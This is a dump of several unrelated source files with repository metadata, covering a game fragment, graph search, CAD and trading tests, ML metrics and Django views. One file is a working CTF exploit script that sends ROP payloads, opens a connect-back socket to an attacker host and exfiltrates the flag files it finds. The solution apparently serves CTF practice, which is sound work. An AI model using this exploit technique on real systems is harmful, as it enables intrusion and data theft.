    while playmore():
        game()
    else:
        # while/else: the else branch runs when the loop condition fails.
        print ("Game Over!")
# Module state: 3x3 board ('E' = empty), symbol/player map, replay answer.
b = [['E','E','E'],['E','E','E'],['E','E','E']]
d = {}
gamecount ='Y'
# Start playing immediately on import/run.
gameset()
|
[
"rohitbansal83@gmail.com"
] |
rohitbansal83@gmail.com
|
abbfffaaa576afa02143457a207b4667225aa4ac
|
066e503dec4934d6a528a3e80fbf842663af2b9f
|
/algorithms/shortest_paths/beam.py
|
d94911fa4e3614856753a04a0682b35aa337e034
|
[] |
no_license
|
rirolli/Homework
|
3559212d12f69be8541a0f169bc94de7f9156911
|
c021fcc617ada0a0cc461c9e6c317d9bd6afb1af
|
refs/heads/master
| 2021-05-26T04:05:23.120032
| 2020-04-10T21:24:33
| 2020-04-10T21:24:33
| 254,045,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,596
|
py
|
# beamsearch.py - breadth-first search with limited queueing
#
# Copyright 2016-2019 NetworkX developers.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
"""Basic algorithms for breadth-first searching the nodes of a graph."""
import networkx as nx
# from .breadth_first_search import generic_bfs_edges
from networkx.algorithms.traversal.depth_first_search import dfs_edges
__all__ = ['dfs_beam_edges']
def dfs_beam_edges(G, source, value, width=None):
    """Iterate over the edges of a depth-first search from `source`.

    Parameters
    ----------
    G : NetworkX graph
    source : node
        Starting node; only edges in the component reachable from this
        node are yielded.
    value : function
        Node-scoring heuristic. NOTE(review): accepted for interface
        compatibility but NOT used — see Notes.
    width : int (default = None)
        Beam width. NOTE(review): also unused.

    Yields
    ------
    edge
        Edges of the DFS starting from `source`, as (u, v) pairs.

    Notes
    -----
    Despite the name, this adaptation of NetworkX's beam-search example
    performs a plain depth-first traversal: the original nested
    `successors` helper (which ranked the best `width` neighbors by
    `value`) was defined but never wired into the traversal. The dead
    helper and the unused `width` default computation have been removed,
    and the Python-2-era `for e in ...: yield e` loop replaced with
    `yield from` (the original's own TODO). Observable behavior is
    unchanged.
    """
    yield from dfs_edges(G, source)
|
[
"riccardo.ung@outlook.it"
] |
riccardo.ung@outlook.it
|
425f7013d61631a6802b53c0435d6554e5d5152d
|
df620e718bfdf78497c9bddcbdcbc290dc6e13f1
|
/chassis/hptr_freecad.py
|
31291f44ad168b43e9a953ec554e9670270e31ae
|
[
"MIT"
] |
permissive
|
UAF-SuperDARN-OPS/SuperDARN_Transmitter
|
156ff3854f45304c68cfbcbcc4be9f1ba1cf9d58
|
9f84401ca4723f55f4b7568e4d191f6ffcef3c09
|
refs/heads/master
| 2018-12-20T18:32:08.228770
| 2018-09-18T17:49:37
| 2018-09-18T17:49:37
| 15,055,287
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,661
|
py
|
# python script to generate transmitter plate
# using freecad scripting
import sys
sys.path.append('/usr/lib/freecad')
from FreeCAD import Base
import Part
import pdb
# Vector component indices for Base.Vector tuples.
XIDX = 0
YIDX = 1
ZIDX = 2
# units in inches..
#origin at lower left corner of plate
#        / height
#  |-----|
#  |     |width
#  X-----|
#  length
# Millimetres per inch — FreeCAD works in mm, dimensions below are inches.
IN = 25.4
PCB_WIDTH = 2.65 * IN
PCB_LEN = 4.26 * IN
PCB_HEIGHT = (.45 + .062) * IN
STANDOFF_SIZE = .25 * IN
WALL_THICKNESS = (1./4) * IN
WALL_DIAMETER = .5 * IN
FLOOR_DIAMETER = WALL_DIAMETER / 2.
SIDE_CLEARANCE = WALL_DIAMETER
BACK_CLEARANCE = 2 * WALL_DIAMETER
TOP_CLEARANCE = .25 * IN
BOX_HEIGHT = PCB_HEIGHT + 2 * WALL_THICKNESS + TOP_CLEARANCE
BOX_LENGTH = 6 * IN
BOX_WIDTH = 3 * IN
# hole diameter for tapping, in inches
DRILL_6D32 = 0.10650 * IN # 6D32 for pcb mounting holes..
DRILL_4D40 = 0.08900 * IN # 4D40 for lid attachment
# mounting holes...
# mounting hole locations, offset from PCB edge (inches, as (x, y) pairs)
holes_6d32 = [ (1.125, 5.025), (1.125, 0.275), (5.475, 5.025), (5.475, 0.275)]
holes_4d40 = [ (1.125, 5.025), (1.125, 0.275), (5.475, 5.025), (5.475, 0.275)]
def drill_holes(plate, holes, drill):
    """Cut a cylindrical hole of diameter `drill` (mm) at each (x, y) in `holes`.

    Hole positions are given in inches and converted here; returns the cut
    shape. NOTE(review): PLATE_HEIGHT is not defined anywhere in this file,
    so calling this raises NameError — both call sites in main() are
    commented out. Define PLATE_HEIGHT (or pass a depth) before use.
    """
    for hole in holes:
        hole_center = Base.Vector(hole[0] * IN, hole[1] * IN, 0)
        hole_radius = drill / 2.
        drill_hole = Part.makeCylinder(hole_radius, PLATE_HEIGHT, hole_center)
        plate = plate.cut(drill_hole)
    return plate
def main():
    """Model the transmitter box (outer shell minus filleted pocket) and export STEP."""
    # create box base, extrude up
    box = Part.makeBox(BOX_LENGTH + 2 * WALL_THICKNESS, BOX_WIDTH + 2 * WALL_THICKNESS, BOX_HEIGHT + 2 * WALL_THICKNESS)
    # Shift so the pocket (made at the origin) sits centred in the walls.
    box.translate(Base.Vector(-WALL_THICKNESS, -WALL_THICKNESS, - 2 * WALL_THICKNESS))
    pocket = Part.makeBox(BOX_LENGTH, BOX_WIDTH, BOX_HEIGHT)
    wall_edges = []
    # fillet sides of pocket
    for edge in pocket.Edges:
        v1 = edge.Vertexes[0].Point
        v2 = edge.Vertexes[1].Point
        # Vertical edges: both endpoints share x and y.
        if v1[XIDX] == v2[XIDX] and v1[YIDX] == v2[YIDX]:
            wall_edges.append(edge)
    pocket = pocket.makeFillet(WALL_DIAMETER / 2., wall_edges)
    # fillet floor of pocket
    floor_edges = []
    for edge in pocket.Edges:
        v1 = edge.Vertexes[0].Point
        v2 = edge.Vertexes[1].Point
        # Bottom edges: both endpoints at z == 0.
        if (v1[ZIDX] == 0) and (v2[ZIDX] == 0):
            floor_edges.append(edge)
    pocket = pocket.makeFillet(FLOOR_DIAMETER / 2., floor_edges)
    # Subtract the pocket to leave the hollow box.
    box = box.cut(pocket)
    # drill hptr mounting holes
    #pocket = drill_holes(pocket, holes_6d32, DRILL_6D32)
    # drill lid mounting holes
    #pocket = drill_holes(pocket, holes_4d40, DRILL_4D40)
    # export STEP file
    box.exportStep("klein_al_hptr_box.stp")
if __name__ == '__main__':
    main()
|
[
"jtklein@alaska.edu"
] |
jtklein@alaska.edu
|
9fda1a33b05de313c29b969f23ddb11187a608ef
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/ETFMM_K/YW_ETFMM_SHXJ_037_K.py
|
6cafe2a50769ad870d3f93965281ee3afa7ef5a5
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,261
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from env_restart import *
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_ETFMM_SHXJ_037_K(xtp_test_case):
    """Shanghai A-share limit-price buy with a nonexistent ticker.

    Expects the order to be rejected ('废单') with error 11000010.
    """
    # YW_ETFMM_SHXJ_037_K
    def test_YW_ETFMM_SHXJ_037_K(self):
        title='上海A股股票交易日限价委托买-不存在的证券代码'
        # Expected results for this test case.
        # Possible expected states: initial, pending, partially filled, filled,
        # partial-cancel reported, partially cancelled, cancel pending,
        # cancelled, rejected, cancel-rejected, internally cancelled.
        # xtp_ID and cancel_xtpID default to 0 and need no change.
        case_goal = {
            '期望状态': '废单',
            'errorID': 11000010,
            'errorMSG': queryOrderErrorMsg(11000010),
            '是否生成报单': '是',
            '是否是撤废': '否',
            'xtp_ID': 0,
            'cancel_xtpID': 0,
        }
        logger.warning(title)
        # Order request parameters ------------------------------------------
        wt_reqs = {
            'business_type':Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
            'order_client_id':2,
            'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
            # Deliberately nonexistent security code.
            'ticker': '000000',
            'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_BUY'],
            'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
            'price': 10.00,
            'quantity': 200,
            'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
        }
        ParmIni(Api,case_goal['期望状态'],wt_reqs['price_type'])
        rs = serviceTest(Api, case_goal, wt_reqs)
        logger.warning('执行结果为' + str(rs['用例测试结果']) + ',' + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
        self.assertEqual(rs['用例测试结果'], True) # the case itself must pass
if __name__ == '__main__':
    unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
54521e4ec1133558c781759b21b0d92694377dd1
|
815a3dd3d3c84c6baf9f49b9a9fb5c125584d5e7
|
/2nd year/IA/lab6-EVAL-ML/main.py
|
b521d38687beeaa986ef43ad34e1ab5219ee5453
|
[] |
no_license
|
Tonissonn/college-ubb-labs
|
c97bbbe48adbcbfe9b8a0bbfc77149c0535411d6
|
87b05fc4033868d1e9d3553e001f0ef821016b1f
|
refs/heads/main
| 2023-08-01T01:49:03.656923
| 2021-09-13T11:48:46
| 2021-09-13T11:48:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,243
|
py
|
from math import log
def prediction_error(real_outputs, computed_outputs):
    """Root of the mean per-sample RMSE² between real and computed vectors.

    Each row of the two inputs is a vector; the per-row RMSE values are
    combined as sqrt(mean(rmse_i**2)).
    """
    from math import sqrt
    per_sample = []
    for real_vec, comp_vec in zip(real_outputs, computed_outputs):
        squared = [(r - c) ** 2 for r, c in zip(real_vec, comp_vec)]
        per_sample.append(sqrt(sum(squared) / len(real_vec)))
    return sqrt(sum(e ** 2 for e in per_sample) / len(real_outputs))
def compute_dict(labels, values):
    """Build a dict keyed by `labels`.

    Each value is a fresh empty dict when values == 'dict', otherwise 0.
    """
    return {label: ({} if values == 'dict' else 0) for label in labels}
def confusion_matrix(real, computed, labels):
    """Confusion matrix as nested dicts: cm[actual][predicted] -> count.

    `real` and `computed` are parallel label sequences; `labels` lists the
    label universe. (The tiny compute_dict helper is inlined here.)
    """
    cm = {}
    for actual in labels:
        counts = {predicted: 0 for predicted in labels}
        for idx, actual_label in enumerate(real):
            if actual_label == actual:
                counts[computed[idx]] += 1
        cm[actual] = counts
    return cm
def accuracy_precision_recall(real_labels, computed_labels, label_names):
    """Return (confusion_matrix, accuracy, precision, recall).

    precision/recall map each label name to its score. A label that is
    never predicted (precision) or never occurs (recall) still divides
    by zero — unchanged from the original behaviour.
    """
    cm = confusion_matrix(real_labels, computed_labels, label_names)
    hits = sum(1 for i in range(len(real_labels))
               if real_labels[i] == computed_labels[i])
    accuracy = hits / len(real_labels)
    precision = {}
    recall = {}
    for name in label_names:
        predicted_total = sum(row[name] for row in cm.values())
        precision[name] = cm[name][name] / predicted_total
        recall[name] = cm[name][name] / sum(cm[name].values())
    return cm, accuracy, precision, recall
# using MSE = mean squared error
def regression_loss(real, computed):
    """Mean squared error between two equal-length numeric sequences."""
    n = len(real)
    return sum((r - computed[i]) ** 2 for i, r in enumerate(real)) / n
def binary_loss(real, computed):
    """Binary cross-entropy.

    real[i] is 0/1; computed[i] holds (p_positive, p_negative).
    """
    total = 0.0
    for label, probs in zip(real, computed):
        total += label * log(probs[0]) + (1 - label) * log(probs[1])
    return -total / len(real)
def multi_class_loss(real, computed):
    """Categorical cross-entropy; real[i] indexes the true-class probability.

    1e-15 guards log(0) exactly as in the original.
    """
    total = sum(log(1e-15 + computed[i][true_cls])
                for i, true_cls in enumerate(real))
    return -total / len(real)
def float_xor(a, b):
    """Bytewise XOR of the IEEE-754 double representations of a and b.

    The XORed bytes are reinterpreted as a float; x ^ x yields 0.0 and
    x ^ 0.0 yields x.
    """
    import struct
    packed_a = struct.pack('d', a)
    packed_b = struct.pack('d', b)
    xored = bytes(byte_a ^ byte_b for byte_a, byte_b in zip(packed_a, packed_b))
    return struct.unpack('d', xored)[0]
def multi_label_loss(real, computed):
    """Mean float_xor 'distance' over every (row, position) pair.

    Rows of `real` and `computed` are parallel label vectors; the result
    is normalised by the total number of positions.
    """
    row_totals = [
        sum(float_xor(r_row[j], c_row[j]) for j in range(len(r_row)))
        for r_row, c_row in zip(real, computed)
    ]
    return sum(row_totals) / (len(real) * len(real[0]))
# Ad-hoc smoke tests exercising each metric defined above.
# prediction error
real_for_error = [[533, 1000, 89], [577, 1103, 76], [550, 1523, 43], [520, 1300, 13], [530, 1530, 65], [589, 1050, 83]]
computed_for_error = [[529, 1000, 88], [577, 1113, 76], [540, 1600, 54], [523, 1299, 13], [545, 1505, 68],
                      [601, 1065, 76]]
print(prediction_error(real_for_error, computed_for_error))
print()
# accuracy, prediction, recall
real_for_apr = ['a', 'a', 'b', 'c', 'b', 'c', 'a', 'a', 'b', 'c', 'a']
computed_for_apr = ['a', 'a', 'c', 'c', 'a', 'c', 'b', 'a', 'b', 'a', 'c']
names_for_apr = ['a', 'b', 'c']
c, a, p, r = accuracy_precision_recall(real_for_apr, computed_for_apr, names_for_apr)
print(str(c))
print(str(a))
print(str(p))
print(str(r) + '\n')
# regression loss
real_for_regloss = [15, 85, 73, 22, 35, 56, 43, 72]
computed_for_regloss = [17, 85, 78, 31, 35, 55, 43, 74]
print(regression_loss(real_for_regloss, computed_for_regloss))
# binary classifier loss (each computed entry is [p_positive, p_negative])
real_for_binaryloss = [1, 0, 0, 0, 1, 1, 1, 1, 0]
computed_for_binaryloss = [[.1, .9], [.7, .3], [.2, .8], [.9, .1], [.8, .2], [.5, .5], [.3, .7], [.2, .8], [.9, .1]]
print(binary_loss(real_for_binaryloss, computed_for_binaryloss))
# multiclass classifier loss
real_for_multiclassloss = [3, 1, 1, 2, 0, 0, 1, 3, 3, 2, 0]
computed_for_multiclassloss = [[.25, .25, .25, .25], [.0, .7, .2, .1], [.1, .6, .1, .2], [.3, .3, .2, .2],
                               [.7, .0, .0, .3], [.5, .5, .0, .0], [.2, .8, .0, .0], [.0, .1, .9, .0], [.0, .2, .8, .0],
                               [.1, .1, .7, .1], [.6, .2, .2, .0]]
print(multi_class_loss(real_for_multiclassloss, computed_for_multiclassloss))
# multi-label classifier loss - limit is 0.4
real_for_multilabelloss = [[1, 1, 1, 0], [0, 1, 0, 1], [0, 1, 0, 0], [1, 1, 0, 1]]
computed_for_multilabelloss = [[.9, .5, .4, .2], [.2, .7, .2, .8], [.1, .5, .2, .3], [.9, .7, .2, .4]]
print(multi_label_loss(real_for_multilabelloss, computed_for_multilabelloss))
|
[
"radu_vintila20@yahoo.com"
] |
radu_vintila20@yahoo.com
|
ad7b3f0e40711a9ff2d2a74e6224f2657ac0416a
|
8a3fa4fc5bcf61b107db9c9de25f7e41f261cc05
|
/pwn/blacklist/soln/sploit.py
|
f8bf79fbfb6cb55d33e726533b93b6ea705b6559
|
[
"CC-BY-4.0",
"MIT"
] |
permissive
|
nghialuffy/pbctf-2020-challs
|
bde7ea47de1488b0509a64f7b0fff2297ced7e04
|
a2bea96ee80c256ed4a0a8d2dad263b346ddbf0a
|
refs/heads/master
| 2023-01-31T02:38:50.242870
| 2020-12-16T17:27:46
| 2020-12-16T17:27:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,306
|
py
|
# CTF: playtesting for theKidOfAcrania
# Task: Hard ROP
# Exploit-By: braindead <braindeaded@protonmail.com>
from pwn import *
import gadgets as g
import linux
from collections import defaultdict, namedtuple
import shlex
sc = linux.syscalls(mode='_32')
deflabel = namedtuple('deflabel', ['name'])
pad_to = namedtuple('pad_to', ['addr'])
LABELS = {}
class L:
def __getattr__(self, x):
global L
return LABELS[x]
L = L()
def pad(n=4): return ("Lain"*((n+3)/4))[-n:]
# Counter for the rop<N>.bin debug dumps written by pack().
rop_i = 0
def pack(xs, maxlen=100):
    """Assemble a ROP chain from a mixed list of markers and values.

    Items of xs: deflabel (record current offset in LABELS), pad_to (pad
    to an absolute offset), int (packed as 32-bit little-endian),
    callable (resolved at emit time with LABELS['here'] set to its own
    offset), or raw bytes. Two passes: first resolves label offsets so
    callables can reference them, second emits the bytes. Each chain is
    dumped to rop<N>.bin; warns when longer than maxlen.
    """
    global LABELS
    pos = 0
    # Pass 1: compute the offset of every item.
    for x in xs:
        if isinstance(x, deflabel):
            LABELS[x.name] = pos
            #print('label %s = 0x%03x'%(x.name, pos))
        elif isinstance(x, pad_to):
            assert pos <= x.addr
            pos = x.addr
        elif isinstance(x, int):
            pos += 4
        elif callable(x):
            pos += 4
        else:
            pos += len(x)
    b = ''
    # Pass 2: emit bytes, resolving callables against the label table.
    for x in xs:
        if isinstance(x, deflabel):
            assert len(b) == LABELS[x.name]
            continue
        if isinstance(x, pad_to):
            assert x.addr >= len(b)
            x = pad(x.addr - len(b))
        elif callable(x):
            LABELS['here'] = len(b)
            x = x()
        if isinstance(x, int):
            x = p32(x)
        b += x
    global rop_i
    rop_i += 1
    with open('rop%i.bin'%rop_i, 'wb') as f:
        f.write(b)
    if len(b) > maxlen:
        warn('ropchain too long (%i)'%len(b))
    return b
# Hard-coded addresses and gadgets from the target './blacklist' binary.
VULN = 0x0804891f
PUSH_ESP_CALL_EDI = 0x0807883e # push esp ; call edi ;
SOCKADDR = 0x00002078 + 0x080d8000
SCRATCH = 0x080d8000
TCP_PARAMS = 0x080d9c18
UDP_PARAMS = 0x080d9ec0
# Connect-back host/port from command-line args; LHOST packed as a
# 32-bit value, LPORT byte-swapped into network (big-endian) order.
LHOST = list(map(int, args.LHOST.split('.')))
LPORT = int(args.LPORT)
LHOST = u32(''.join(map(chr, LHOST)))
LPORT = (LPORT&0xFF)*0x100 + (LPORT>>8)
ADD_EAX_EDX = 0x08068263 # add eax, edx ; ret ;
SUB_EAX_0X10_POP_EDI = 0x08091bd8 # sub eax, 0x10 ; pop edi ; ret ;
SUB_EDX_0X10_POP_EDI = 0x0806791b # sub edx, 0x10 ; jb 0x80679f0 ; lea eax, [edi + 0xf] ; pop edi ; ret ;
MOVSD = 0x080c0e91 # movsd dword ptr es:[edi], dword ptr [esi] ; ret ;
SHITTY_WRITE = 0x080a8f2b # add dword ptr [edx + 1], ebp ; call eax ;
SOCKETCALL = 0x0806f049 # useless due to canary
VSYSCALL_POP_EBX = 0x0806cdbe
ADDR_OF_MINUS_36 = 0x080abd1a
READ_WITH_SIZE = 0x0804892a
# Stage 1: must fit the 100-byte overflow; creates a TCP socket and
# connects back to LHOST:LPORT, then pivots the stack.
rop = pack([
    # 5 free slots:
    g.POP_ECX_EBX, SOCKADDR, 3, # SYS_CONNECT
    g.VSYSCALL,
    VULN,
    pad_to(20),
    g.POP_EDI, g.POP_EBX_EBP_ESI_EDI,
    PUSH_ESP_CALL_EDI,
    # struct sockaddr_in (also popped into ESI and EDI)
    p16(2), p16(LPORT), LHOST,
    g.POP_EAX_EDX_EBX, g.POP_EDX_ECX_EBX, SOCKADDR+4-1, pad(),
    SHITTY_WRITE, # -> pop ecx; pop ebx
    # socket(AF_INET, SOCK_STREAM, 0) -> 0
    TCP_PARAMS, 1, # SYS_SOCKET
    g.POP_EAX, sc.socketcall,
    VSYSCALL_POP_EBX,
    ADDR_OF_MINUS_36-10,
    g.ADD_EBP_DWORD_PTR_EBX_0XA_,
    # now ebp points to start of buffer
    # 2 free slots:
    g.POP_EAX, sc.socketcall,
    # pivot to ebp
    g.LEAVE
])
info('rop size: %d/100'%len(rop))
# Stage 2: re-establishes the connect-back and arranges a large read so
# arbitrary-size payloads (exec_rop below) can be streamed in.
rop2 = pack([
    'ROP2',
    pad_to(16), (-16)&0xffffffff,
    g.POP_EAX, sc.socketcall,
    g.POP_EDX_EBX, # to skip sockaddr
    p16(2), p16(LPORT), LHOST,
    g.POP_ECX_EBX, TCP_PARAMS, 1, # SYS_SOCKET
    g.VSYSCALL,
    g.POP_EAX, sc.socketcall,
    g.POP_ECX_EBX, SOCKADDR, 3, # SYS_CONNECT
    g.VSYSCALL,
    # restore ebp
    g.POP_ESI, SOCKADDR+4-10,
    g.ADD_EBP_DWORD_PTR_ESI_0XA_,
    READ_WITH_SIZE, 0x10000,
    pad_to(100),
])
info('rop2 size: %d/100'%len(rop2))
# Target selection: local test server, remote CTF host, or strace'd process.
base = './flag_dir'
if args.LOCAL:
    r = remote('127.0.0.1', 8888)
elif args.RHOST:
    base = '/flag_dir'
    #r = remote('172.17.0.2', 1337)
    r = remote(args.RHOST, args.RPORT)
    pass
else:
    p = process(['strace']+shlex.split(args.STRACE)+['-o', 'trace', '-f', './blacklist']); r = p
# Send stage 1, wait for the connect-back, then send stage 2 likewise.
l = listen(int(args.LPORT))
r.send(rop)
info('sent stage 1')
r = l.wait_for_connection()
l = listen(int(args.LPORT))
r.send(rop2)
info('sent stage 2')
r = l.wait_for_connection()
# Address of an `int 0x80` instruction in the binary.
INT80 = 0x806fa30
# Toggled once per payload (remnant of the commented alternating scheme below).
rop_state = 0
def exec_rop(tag, text, data=[]):
    """Send one self-reloading ROP payload over the established connection.

    `text` is the gadget list to execute; `data` is appended after the
    pivot so labels (e.g. 'path', 'buffer') can point into it. Every
    payload ends by reading the NEXT payload back into the same buffer,
    so exec_rop can be called repeatedly. NOTE(review): the mutable
    default data=[] is never mutated here, so it is harmless.
    """
    global rop_state
    rop_state ^= 1
    rop3 = pack(
        [
            tag,
            pad_to(0x34 - 40),
            deflabel('loader'),
            g.POP_EBP, SOCKADDR+4-2,
            g.POP_EAX, sc.read,
            g.POP_EDX_ECX_EBX, 0x10000, (-32)&0xffffffff, 0,
            g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &rop
            INT80,
        ]
        + #([g.RET, g.VSYSCALL] if rop_state == 1 else [g.VSYSCALL, g.RET]) +
        [
            pad_to(0x34)
        ]
        + text +
        [
            # pivot esp to the loader in front for the payload
            g.POP_ECX_EBX, lambda: (L.loader-32)&0xffffffff, 0,
            g.POP_EBP, SOCKADDR+4-2,
            g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &rop
            g.MOV_ESP_ECX,
        ]
        + data +
        [
        ], maxlen=0x10000)
    #info('sending %d byte %s payload'%(len(rop3), tag))
    r.send(rop3)
def list_dir(dir_path):
    """Enumerate `dir_path` on the target via open/readdir ROP payloads.

    Opens the directory (fd 1 by construction), reads dirents one at a
    time and writes each back over the socket (fd 0), stopping when a
    name repeats. Returns the list of entry names (including '.'/'..').
    """
    info('listing '+repr(dir_path))
    exec_rop('OPENDIR',
        text = [
            g.POP_EAX, sc.open,
            g.POP_EDX_ECX_EBX, 0, 0, lambda: L.path - 32,
            g.POP_ESI, SOCKADDR+4-10,
            g.POP_EBP, 0,
            g.ADD_EBP_DWORD_PTR_ESI_0XA_, # ebp = &sin
            g.ADD_EBX_EBP, # ebx = &path
            INT80,
            g.POP_EDX_ECX_EBX, 1, lambda: (L.path-32)&0xffffffff, 0,
            g.POP_EBP, SOCKADDR+4-2,
            g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
            g.POP_EAX, sc.write,
            g.VSYSCALL,
        ],
        data = [
            deflabel('path'),
            dir_path, '\x00',
        ]
    )
    r.recv(1) # sync to prevent tcp merging
    entries = []
    prev_name = None
    while True:
        exec_rop('READDIR',
            text = [
                # readdir(1, &buffer, 1)
                g.POP_EDX_ECX_EBX, 1, lambda: (L.buffer-32)&0xffffffff, 1,
                g.POP_EBP, SOCKADDR+4-2,
                g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
                g.POP_EAX, sc.readdir,
                g.VSYSCALL,
                # write(0, &buffer, 262)
                g.POP_EDX_ECX_EBX, 266, lambda: (L.buffer-32)&0xffffffff, 0,
                g.POP_EBP, SOCKADDR+4-2,
                g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
                g.POP_EAX, sc.write,
                g.VSYSCALL,
            ],
            data = [
                deflabel('buffer'),
            ]
        )
        dirent = r.recv(266)
        # old_linux_dirent: name length at offset 8, name at offset 10.
        name = dirent[10:10+u16(dirent[8:10])]
        if name == prev_name:
            break
        prev_name = name
        entries.append(name)
        #success('entry %s'%repr(name))
    exec_rop('CLOSE',
        text = [
            g.POP_EAX, sc.close,
            g.POP_EBX, 1,
            INT80,
        ],
    )
    return entries
def get_file(path):
    """Read up to 64 bytes of `path` on the target and return them.

    Opens the file (fd 1), reads into a scratch buffer, writes the read
    bytes back over the socket (fd 0), closes the fd, and returns one
    received line.
    """
    exec_rop('READ',
        text = [
            # open(path, 0, 0) => 1
            g.POP_EAX, sc.open,
            g.POP_EDX_ECX_EBX, 0, 0, lambda: L.path - 32,
            g.POP_ESI, SOCKADDR+4-10,
            g.POP_EBP, 0,
            g.ADD_EBP_DWORD_PTR_ESI_0XA_, # ebp = &sin
            g.ADD_EBX_EBP, # ebx = &path
            INT80,
            # read(1, &buffer, 64)
            g.POP_EDX_ECX_EBX, 64, lambda: (L.buffer-32)&0xffffffff, 1,
            g.POP_EBP, SOCKADDR+4-2,
            g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
            g.POP_EAX, sc.read,
            INT80,
            # edx = eax
            g.POP_EDX, g.POP_EBX_EDX,
            g.PUSH_EAX_CALL_EDX,
            # write(0, &buffer, n)
            g.POP_ECX_EBX, lambda: (L.buffer-32)&0xffffffff, 0,
            g.POP_EBP, SOCKADDR+4-2,
            g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
            g.POP_EAX, sc.write,
            INT80,
            # close(1)
            g.POP_EAX, sc.close,
            g.POP_EBX, 1,
            INT80,
        ],
        data = [
            deflabel('path'),
            deflabel('buffer'),
            path, '\x00',
        ]
    )
    return r.recvline()
# Walk the three-level flag_dir tree and collect every file path.
dir0 = list_dir(base)
files = []
for x in dir0:
    if x in ['.', '..']: continue
    dir1 = list_dir(base+'/'+x)
    for y in dir1:
        if y in ['.', '..']: continue
        dir2 = list_dir(base+'/'+x+'/'+y)
        for z in dir2:
            if z in ['.', '..']: continue
            files.append(base+'/'+x+'/'+y+'/'+z)
success('got %i files'%len(files))
# Dump every file's contents; the real flag contains a '{'.
flags_sink = open('flags.txt', 'w')
flags = []
info("dumping flags to flags.txt")
for f in files:
    x = get_file(f)
    flags_sink.write(x)
    flags.append(x)
for f in flags:
    if '{' in f:
        success('FLAG: '+repr(f))
# Cleanly exit the remote ROP loop and close the connection.
exec_rop('EXIT', [ g.POP_EAX, sc.exit, g.POP_EBX, 0, INT80 ])
r.close()
#p.wait()
|
[
"sampritipanda@outlook.com"
] |
sampritipanda@outlook.com
|
4e2d4d03f74582bc290b043e3f4267c4fa3cc589
|
1b38e2a313204b757496eaf6bf28770db8dd39db
|
/app/views.py
|
16a7676882d0aba0023b9d6ba833d7fa03ea5d1a
|
[] |
no_license
|
araujooj/transaction-api-django
|
4b10a3184f3c1f8a82a0500a142ac036f09abe7d
|
de40c1328223fc01b4028b4219ac831acc82a08b
|
refs/heads/master
| 2023-02-21T16:29:31.194071
| 2021-01-27T12:30:20
| 2021-01-27T12:30:20
| 333,413,770
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,140
|
py
|
from rest_framework.response import Response
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.exceptions import NotFound
from app.models import Transaction
from app.serializers import TransactionSerializer
from functools import reduce
class TransactionListAndCreate(APIView):
    """List all transactions with wallet aggregates, or create a new one."""

    def get(self, request):
        """Return every transaction plus income/outcome/total aggregates."""
        transactions = Transaction.objects.all()
        serializer = TransactionSerializer(transactions, many=True)
        # sum() with a generator replaces the original
        # reduce(lambda x, y: x + y, [...], 0) boilerplate; an empty
        # sequence still yields 0 like reduce's initializer did.
        outcome_value = sum(item.value for item in transactions if item.type == 'outcome')
        income_value = sum(item.value for item in transactions if item.type == 'income')
        total = income_value - outcome_value
        return Response({
            'transactions': serializer.data,
            'wallet': {
                'income': income_value,
                'outcome': outcome_value,
                'total': total
            }})

    def post(self, request):
        """Validate and persist a new transaction; 201 on success, 400 on errors."""
        serializer = TransactionSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TransactionUpdateAndDelete(APIView):
    """Retrieve, update or delete a single Transaction by primary key."""
    def get_object(self, pk):
        # Translate DoesNotExist into DRF's 404 NotFound for the client.
        try:
            return Transaction.objects.get(pk=pk)
        except Transaction.DoesNotExist:
            raise NotFound()
    def get(self, request, pk):
        """Return the serialized transaction."""
        serializer = TransactionSerializer(self.get_object(pk))
        return Response(serializer.data)
    def put(self, request, pk):
        """Full update; 400 with field errors when validation fails."""
        serializer = TransactionSerializer(self.get_object(pk), data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    def delete(self, request, pk):
        """Delete the transaction and return 204 No Content."""
        self.get_object(pk).delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
|
[
